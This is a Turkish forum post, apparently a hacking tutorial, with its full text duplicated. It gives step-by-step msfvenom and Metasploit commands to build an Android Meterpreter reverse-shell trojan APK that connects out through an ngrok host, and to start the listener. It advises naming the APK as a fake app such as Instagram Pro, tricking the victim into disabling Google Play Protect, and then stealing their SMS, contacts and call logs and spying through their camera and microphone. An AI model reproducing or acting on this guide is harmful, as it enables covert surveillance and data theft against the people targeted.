Başlık: Herkese merhaba arkadaşlar bu konumda sizlere metasploit ile dış ağlara nasıl sızılır android telefon nasıl dinlenir onu anlatacağım. Gerekli kodları da daha iyi anlamanız için size sırasıyla harfiyen anlatacağım.
Arkadaşlar ilk öncelikle sanal makinemiz Kali Linux'a girip bir terminal açıyoruz ardından şu kodları yazıyoruz
Kod 1 : msfvenom -p android/meterpreter/reverse_tcp lhost=4.tcp.ngrok.io lport=13959 -o /sdcard/test.apk
Arkadaşlar bu kodları yazdıktan sonra size bir çıktısını vericek şu şekilde
Not : Çıktısını verdiği zaman linux sanal makinenizin dosyalarına bakarak oluşturduğumuz APK nın oraya düştüğünü görebilirsiniz) görsel
Arkadaşlar kod 1de lhost ile lportu ngrok dan alıcaksınız yani dediğim kısım lhost u 4.tcp den itibaren alıcaksınız lport da zaten yazıyor daha iyi anlamanız için bir resim bırakacağim verdiğim kodlara bakıp lportu da kendiniz yazabilirsiniz herkesinki farklı oluyor.
Görsel de gördüğünüz gibi
5.tcp.ngrok.io vs yazıyor hemen yanındaki ise lport arkadaşlar onu da lport kısmına yazıcaksınız
Sonuçta kendimize bir Apk virüs oluşturuyoruz bu oluşturduğumuz virüsü karşı tarafa atacağız atarken nasıl atacağınız sizin kendi sosyal mühendislik bilginize kalmıştır. payloadinizin adını istediğiniz gibi belirleyebilirsiniz ben test amaçlı test.apk yaptım siz de örneğin: (ınstagrampro.apk Twitter.apk) gibi vs şeyler ne isterseniz yazabilirsiniz işte.
---------------
Arkadaşlar şimdi herşey tamam APK mızı oluşturduk güzel ce şimdi biz bunu kurbanımıza atacağız ama onu nasıl dinleyeceğiz diyorsunuz şimdi onu anlatıcam
Yeni bir terminal açalım kafamız karışmasın arkadaşlar şimdi /msfconsole yazarak başlıyoruz karşınıza söyle bir ekran gelicek
Burası karşı tarafın telefonunu dinleyeceğimiz yer arkadaşlar şimdi dinlemeye almak için kodları yazalım
Kod 2 : use exploit/multi/handler
Kod 3 : set payload android/meterpreter/reverse_tcp
Kod 4 : set lhost 127.0.0.1
Kod 5 : set lport 8080
(Ve en son olarak run diyoruz ve çalıştırıyoruz) 🙂
Kod 6 : run
Not : Arkadaşlar dış ağa bağlanmak için ne olursa olsun hep 127.0.0.1 yazıyoruz bu sabittir değişmez.
Evet arkadaşlar dinlemeye alacağımız kodlar bunlardır.
Herşey bittiğin de ise sizde de böyle bir ekran çıkacaktır arkadaşlar 😊
Arkadaşlar şimdi beni iyi dinleyin tamamen bilgilendirme amaçlı yazdım bu konuyu ve açıkçası sevdiğim bir konudur herşey bittiğin de karşı tarafa bu oluşturduğumuz trojani attığımız zaman karşı tarafın buna tıklaması gerekir karşı taraftan Google Play protecti kapatmasını isteyin burda bi nevi de öne çıkan sizin sosyal mühendisliğinize kalmıştır.
Tamam şimdi herşey bitti dinlemeye alacağımız kodları da yazdık şimdi ne yapacağız diyorsunuz. şimdi ise karşı tarafa attığımız zaman kurban buna bir kaç kez tıklamalı arkadaşlar zaten indirirken bir kaç kez tıklamış oluyor ardından cuk diye telefonu sizin dinlemeye aldığınız yere düşüyor artık kaçamaz o bizim elimizde
karşı tarafa virüsümüzü attığımız zaman o tıkladığı zaman /help kodunu yazarak kurbanın telefonunda neler yapacağınızı öğrenebilirsiniz.
Örneğin : dump_sms SMS lerini toplar 😎 karşı tarafın Instagramını hackleyebilirsiniz kullanıcı adını biliyorsanız
Başka şeyler de yapabilirsiniz örneğin kamerasından onu izleyebilirsiniz dosyalarına bir virüs enjekte edip telefonunu tamamen kalıcı olarak dinleyebilirsiniz ardından fotoğrafini çekebilirsiniz kişilerini görebilirsiniz numarasını alabilirsiniz vs vs bir çok şey var arkadaşlar hangisini anlatayım
Aşağı kodları bırakıyorum çevirip kendiniz de bakabilirsiniz konumu beğendiyseniz eğer like butonuna yumruk atmayı unutmayın sağlıcakla kalın arkadaşlar. 😊
Dinleme kodları.
CommandDescription
app_listShow all installed applications
app_installRequest to install apk file
app_runStart an application
app_uninstallRequest to uninstall application
dump_contactsGet all contacts and save in our PC
dump_calllogGet call log and save in our PC
dump_smsGet all sms and save in our PC
send_smsSend sms to any number
geolocacteCurrent lat and long of the device
record_micSound recorder
webcam_listAvailable cameras
webcam_snap 1/2/3Take photo by selecting camera
webcam_stream 1/2/3Open specific camera and live streaming
Arkadaşlar ilk öncelikle sanal makinemiz Kali Linux'a girip bir terminal açıyoruz ardından şu kodları yazıyoruz
Kod 1 : msfvenom -p android/meterpreter/reverse_tcp lhost=4.tcp.ngrok.io lport=13959 -o /sdcard/test.apk
Arkadaşlar bu kodları yazdıktan sonra size bir çıktısını vericek şu şekilde
Not : Çıktısını verdiği zaman linux sanal makinenizin dosyalarına bakarak oluşturduğumuz APK nın oraya düştüğünü görebilirsiniz) görsel
Arkadaşlar kod 1de lhost ile lportu ngrok dan alıcaksınız yani dediğim kısım lhost u 4.tcp den itibaren alıcaksınız lport da zaten yazıyor daha iyi anlamanız için bir resim bırakacağim verdiğim kodlara bakıp lportu da kendiniz yazabilirsiniz herkesinki farklı oluyor.
Görsel de gördüğünüz gibi
5.tcp.ngrok.io vs yazıyor hemen yanındaki ise lport arkadaşlar onu da lport kısmına yazıcaksınız
Sonuçta kendimize bir Apk virüs oluşturuyoruz bu oluşturduğumuz virüsü karşı tarafa atacağız atarken nasıl atacağınız sizin kendi sosyal mühendislik bilginize kalmıştır. payloadinizin adını istediğiniz gibi belirleyebilirsiniz ben test amaçlı test.apk yaptım siz de örneğin: (ınstagrampro.apk Twitter.apk) gibi vs şeyler ne isterseniz yazabilirsiniz işte.
---------------
Arkadaşlar şimdi herşey tamam APK mızı oluşturduk güzel ce şimdi biz bunu kurbanımıza atacağız ama onu nasıl dinleyeceğiz diyorsunuz şimdi onu anlatıcam
Yeni bir terminal açalım kafamız karışmasın arkadaşlar şimdi /msfconsole yazarak başlıyoruz karşınıza söyle bir ekran gelicek
Burası karşı tarafın telefonunu dinleyeceğimiz yer arkadaşlar şimdi dinlemeye almak için kodları yazalım
Kod 2 : use exploit/multi/handler
Kod 3 : set payload android/meterpreter/reverse_tcp
Kod 4 : set lhost 127.0.0.1
Kod 5 : set lport 8080
(Ve en son olarak run diyoruz ve çalıştırıyoruz) 🙂
Kod 6 : run
Not : Arkadaşlar dış ağa bağlanmak için ne olursa olsun hep 127.0.0.1 yazıyoruz bu sabittir değişmez.
Evet arkadaşlar dinlemeye alacağımız kodlar bunlardır.
Herşey bittiğin de ise sizde de böyle bir ekran çıkacaktır arkadaşlar 😊
Arkadaşlar şimdi beni iyi dinleyin tamamen bilgilendirme amaçlı yazdım bu konuyu ve açıkçası sevdiğim bir konudur herşey bittiğin de karşı tarafa bu oluşturduğumuz trojani attığımız zaman karşı tarafın buna tıklaması gerekir karşı taraftan Google Play protecti kapatmasını isteyin burda bi nevi de öne çıkan sizin sosyal mühendisliğinize kalmıştır.
Tamam şimdi herşey bitti dinlemeye alacağımız kodları da yazdık şimdi ne yapacağız diyorsunuz. şimdi ise karşı tarafa attığımız zaman kurban buna bir kaç kez tıklamalı arkadaşlar zaten indirirken bir kaç kez tıklamış oluyor ardından cuk diye telefonu sizin dinlemeye aldığınız yere düşüyor artık kaçamaz o bizim elimizde
karşı tarafa virüsümüzü attığımız zaman o tıkladığı zaman /help kodunu yazarak kurbanın telefonunda neler yapacağınızı öğrenebilirsiniz.Örneğin : dump_sms SMS lerini toplar 😎 karşı tarafın Instagramını hackleyebilirsiniz kullanıcı adını biliyorsanız
Başka şeyler de yapabilirsiniz örneğin kamerasından onu izleyebilirsiniz
dosyalarına bir virüs enjekte edip telefonunu tamamen kalıcı olarak dinleyebilirsiniz ardından fotoğrafini çekebilirsiniz kişilerini görebilirsiniz numarasını alabilirsiniz vs vs bir çok şey var arkadaşlar hangisini anlatayım Aşağı kodları bırakıyorum çevirip kendiniz de bakabilirsiniz konumu beğendiyseniz eğer like butonuna yumruk atmayı unutmayın sağlıcakla kalın arkadaşlar. 😊
Dinleme kodları.
CommandDescription
app_listShow all installed applications
app_installRequest to install apk file
app_runStart an application
app_uninstallRequest to uninstall application
dump_contactsGet all contacts and save in our PC
dump_calllogGet call log and save in our PC
dump_smsGet all sms and save in our PC
send_smsSend sms to any number
geolocacteCurrent lat and long of the device
record_micSound recorder
webcam_listAvailable cameras
webcam_snap 1/2/3Take photo by selecting camera
webcam_stream 1/2/3Open specific camera and live streaming
